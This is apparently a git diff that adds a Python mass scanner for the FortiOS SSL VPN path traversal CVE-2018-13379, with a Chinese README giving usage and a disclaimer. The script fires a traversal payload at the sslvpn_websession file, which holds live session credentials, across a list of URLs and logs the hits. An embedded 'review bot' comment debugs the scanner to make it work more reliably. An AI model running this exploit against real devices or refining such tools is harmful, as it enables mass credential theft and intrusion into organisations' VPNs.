CVE-2018-13379
BIN
CVE-2018-13379.png
Normal file
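--- a/CVE-2018-13379.py
+++ b/CVE-2018-13379.py
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+# coding:utf-8
+# author:B1anda0
+#affect version FortiOS 5.6.3-5.6.7,6.0.0-6.0.4
+
+import requests,sys,colorama
+from colorama import *
+init(autoreset=True)
+
+
+banner='''\033[1;33;40m
+_______ ________ ___ ___ __ ___ __ ____ ____ ______ ___
+/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |___ \___ \____ / _ \
+| | \ \ / /| |__ ______ ) | | | || | (_) |_____| | __) |__) | / / (_) |
+| | \ \/ / | __|______/ /| | | || |> _ <______| ||__ <|__ < / / \__, |
+| |____ \ / | |____ / /_| |_| || | (_) | | |___) |__) |/ / / /
+\_____| \/ |______| |____|\___/ |_|\___/ |_|____/____//_/ /_/
+'''
+
+
+def verify():
+headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
+payload= '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
+poc=urls+payload
+try:
+requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
+response=requests.get(poc,headers=headers,timeout=15,verify=False)
+if response.status_code==200 and "fgt_lang" in response.content:
+print(u'\033[1;31;40m[+]{} is fortios directory traversal vulnerability'.format(urls))
+#将漏洞地址输出在Vul.txt中
+f=open('./vul.txt','a')
+f.write(urls)
+f.write('\n')
+else:
+print('\033[1;32;40m[-]{} None'.format(urls))
+except:
+print('{} request timeout'.format(urls))
+
+
+if __name__ == '__main__':
+print (banner)
+if len(sys.argv)!=2:
+print('Example:python CVE-2018-13379.py urls.txt')
+else:
+file = open(sys.argv[1])
+for url in file.readlines():
+urls=url.strip()
+if urls[-1]=='/':
+urls=urls[:-1]
+verify()
+print ('Check Over')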
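Review bot: The bare `except:` closing verify() reports every failure as `request timeout`, and because the hit test is `"fgt_lang" in response.content` the comparison is str-vs-bytes on Python 3 and raises TypeError before any result is printed, so under a Python 3 interpreter every host — vulnerable or not — is logged as a timeout and the scan silently produces false negatives. Change the check to `if response.status_code==200 and "fgt_lang" in response.text:` and narrow the handler to `except requests.RequestException as e:` so that connection errors, timeouts and genuine bugs are reported distinctly instead of collapsed into one message. The `vul.txt` handle opened on the hit path is never closed; `with open('./vul.txt','a') as f:` guarantees each confirmed URL is flushed even if a later iteration aborts. Separately, an empty line in urls.txt makes `urls[-1]` raise IndexError outside any handler and ends the whole batch, which a `if not urls: continue` guard before the slash-strip avoids. Since the traversal target `sslvpn_websession` contains live session material, the script is right to record only the URL and not the response body in `vul.txt`; worth a comment so a later change does not start dumping it.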
19
README.md
@@ -1,2 +1,17 @@
|
||||
# CVE-2018-13379
|
||||
Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本
|
||||
## 使用方法&免责声明
|
||||
|
||||
该脚本为Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本。
|
||||
|
||||
使用方法:`Python CVE-2018-13379.py url.txt`
|
||||
|
||||
漏洞地址输出在vul.txt中
|
||||
|
||||
##### 影响版本:
|
||||
|
||||
Fortinet FortiOS 5.6.3 - 5.6.7、6.0.0 - 6.0.4 版本中的SSL VPN 受此漏洞影响。
|
||||
|
||||
漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。
|
||||
|
||||
|
||||
|
||||
工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
|
||||